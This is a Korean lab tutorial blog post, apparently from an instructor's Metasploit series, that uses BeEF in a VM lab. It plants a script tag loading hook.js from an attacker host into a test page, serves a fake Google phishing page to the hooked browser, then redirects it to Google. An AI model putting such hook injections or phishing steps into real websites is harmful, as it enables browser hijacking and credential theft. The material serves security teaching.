정보보안(구버전)/Metasploit 2016. 6. 8. 12:30

Metasploit - 17. BeEF (Web 브라우저 해킹)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

[실습 시스템] Kali Linux, Firewall, Window7, WindowXP

 

 

 - 'BeEF' 툴을 이용하여 공격 타겟에게 피싱 사이트를 제공한다.

 - 또한, 실제 사이트로 리다이렉트하여 피싱 사이트가 아닌, 실제 사이트처럼 사용할 수 있는지 테스트한다.

 

 

[실습 단계]

 

웹-페이지 생성 -> BeEF 실행 -> 구글 피싱 사이트 생성 -> 실제 구글 사이트 리다이렉트 실시 -> 접속 확인

 

 

 

Ex1) 테스트 웹-페이지 생성

 

@ Kali Linix

 

root@kali:~# cd /var/www/html
root@kali:/var/www/html# ls
root@kali:/var/www/html#
root@kali:/var/www/html# vi index.html

 

<HTML>
<BODY>
<CENTER><H1> Test Web Page </H1></CENTER>
<script src="http://192.168.20.50:3000/hook.js"></script>
<P>This is TEST Web Page for this server.</P>
</BODY>
</HTML>

 

: wq!

 

 

root@kali:/var/www/html# cd

root@kali:~#

 

root@kali:~# service apache2 restart

 

 

- Window7에서 크롬 브라우저를 이용하여 'http://192.168.2.50' 접속 확인

 

 

 

Ex2) BeEF 실행

 

 - 'beef-xss' 실행하면, 자동으로 BeEF 웹-페이지가 실행된다.

 

@ Kali Linux

 

root@kali:~# beef-xss &
[2] 15077
root@kali:~#

[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>


 

 

BeEF 웹-페이지 실행 및 로그인('beef/beef' 접속)

 

 

 

 

Ex3) Window7에서 TEST Web Page 접속 테스트

 

 - Window7에서 크롬을 이용하여 'http://192.168.20.50'으로 접속 실시

 

@ Window7

 

http://192.168.20.50 접속 결과

 

 

 

 

 

F12 클릭 -> hook.js 파일 실행 확인

 

 

 

 

 

Ex4) 구글 피싱 사이트 구성

 

 - BeEF 웹-페이지에서 다음과 같은 순번대로 작업을 진행하여 구글 피싱 사이트를 제공하도록 한다.

 

@ Kali Linux

 

'192.168.20.202' 클릭 -> Commands -> Social Engineering -> Google Phising -> Execute 클릭

 

 

 

 

Ex5) Window7에서 구글 파싱 사이트 전환 결과 확인

 

 - Window7에서 방금전 Test Web Page가 구글 피싱 사이트로 변경되었는지 확인한다.

 

@ Window7

 

 

BeEF에 의해서 생성된 구글 피싱 사이트 접속

 

 

 

 

 

Ex6) 구글 피싱 사이트를 실제 구글 사이트로 리다이렉트 실시

 

 - BeEF 웹-페이지에서 다음과 같은 순번대로 작업을 진행하여 구글 사이트로 리다이렉트를 실시한다.

 

@ Kali Linux

 

 

'192.168.20.202' 클릭 -> Commands -> Browser -> Hooked Domain -> Redirect Browser -> http://www.google.com -> Execute 클릭

 

 

 

 

Ex7) Window7에서 구글 사이트 리다이렉트 결과 확인

 

 - Window7에서 방금전 구글 피싱 사이트가 구글 사이트로 변경되었는지 확인한다.

 

 

BeEF에 의해서 리다이렉트된 구글 사이트 접속

 

 

 

 

Ex8) WindowXP 구글 리다이렉트 사이트 접속 구성

 

 - 위와 같은 방법으로 WindowXP에 대해서 구글 리다이렉트 사이트를 구성하여라.

 

 

 

 

 

 - 실습이 완료되었다면, BeEF 종료 및 Kali Linux 재부팅 실시

 

 - Window7, WindowXP 브라우저 종료

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)


Metasploit - 제1장 메타스플로잇 (metaspliot)   

 

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q